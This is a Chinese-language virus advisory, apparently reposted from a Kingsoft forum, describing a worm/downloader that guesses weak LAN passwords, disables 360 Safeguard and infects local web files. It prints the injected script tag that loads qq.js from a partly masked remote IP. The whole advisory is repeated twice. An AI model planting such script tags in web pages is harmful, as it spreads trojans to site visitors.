11.18-11.24流行病毒排行榜NO.9:Win32.Troj.Downloader.c.45056
病毒名稱(中文):感染蟲下載器45056
病毒型別:蠕蟲病毒
病毒長度:45056
影響系統:Win9x WinNT
病毒行為:
這是一個蠕蟲病毒。(蠕蟲病毒比以前少了很多,但對區域網的影響會很大)
該病毒執行後,會指定的網路上下載病毒程式,並且會搜尋區域網內機器,以弱口令進行嘗試性連線。(windows系統的弱口令是最大的風險,沒有口令的系統接入網際網路,可能肯定會引狼入室)
一旦連線成功,則判斷該機器弱口令是否有足夠的許可權, 有則向該遠端機器傳送惡意資料,然後利用windows漏洞來下載程式,予以執行.
1.病毒執行後,產生以下病毒檔案
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.新增病毒啟動項
啟動項名:svchost對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒會觸發taimpo.bat病毒檔案,用來關閉"360安全衛士",使使用者的安全效能降低.
4.病毒會檢測連線的遠端機器,當遠端機器的登入木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到使用者機器上.
5.遍歷磁碟,查詢*.htm、*.PHP、*.ASP等網頁檔案,開始感染,插入一段JS程式碼:
script language=javascript src=http://218.**.**.248/qq.js
這段指令碼病毒,可能會被用作下載更多的木馬程式,利用蠕蟲攻擊傳播,利用下載器種植木馬,是目前駭客偷東西慣用的手法。
解決方案:
%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%預設是c:\windows目錄)
%Documents and Settings%\Administrator\桌面\ctfmon.exe(偽裝成輸入法的程式名)
防範措施:
1.最最重要的,是給系統打補丁,登入系統一定要使用口令,就算是電腦只有自己一個人用,也需要安全的登入口令,口令不能太簡單,以免被遠端攻擊工具猜解。(因為只要電腦接入網際網路,就能給木馬以機會。)
(轉自金山論壇)
11.18-11.24流行病毒排行榜NO.9:Win32.Troj.Downloader.c.45056
病毒名稱(中文):感染蟲下載器45056
病毒型別:蠕蟲病毒
病毒長度:45056
影響系統:Win9x WinNT
病毒行為:
這是一個蠕蟲病毒。(蠕蟲病毒比以前少了很多,但對區域網的影響會很大)
該病毒執行後,會指定的網路上下載病毒程式,並且會搜尋區域網內機器,以弱口令進行嘗試性連線。(windows系統的弱口令是最大的風險,沒有口令的系統接入網際網路,可能肯定會引狼入室)
一旦連線成功,則判斷該機器弱口令是否有足夠的許可權, 有則向該遠端機器傳送惡意資料,然後利用windows漏洞來下載程式,予以執行.
1.病毒執行後,產生以下病毒檔案
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.新增病毒啟動項
啟動項名:svchost對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒會觸發taimpo.bat病毒檔案,用來關閉"360安全衛士",使使用者的安全效能降低.
4.病毒會檢測連線的遠端機器,當遠端機器的登入木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到使用者機器上.
5.遍歷磁碟,查詢*.htm、*.PHP、*.ASP等網頁檔案,開始感染,插入一段JS程式碼:
script language=javascript src=http://218.**.**.248/qq.js
這段指令碼病毒,可能會被用作下載更多的木馬程式,利用蠕蟲攻擊傳播,利用下載器種植木馬,是目前駭客偷東西慣用的手法。
解決方案:
%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%預設是c:\windows目錄)
%WINDIR%\ SYSTEM32\taimpo.txt
%Documents and Settings%\Administrator\桌面\ctfmon.exe(偽裝成輸入法的程式名)
防範措施:
1.最最重要的,是給系統打補丁,登入系統一定要使用口令,就算是電腦只有自己一個人用,也需要安全的登入口令,口令不能太簡單,以免被遠端攻擊工具猜解。(因為只要電腦接入網際網路,就能給木馬以機會。)
(轉自金山論壇)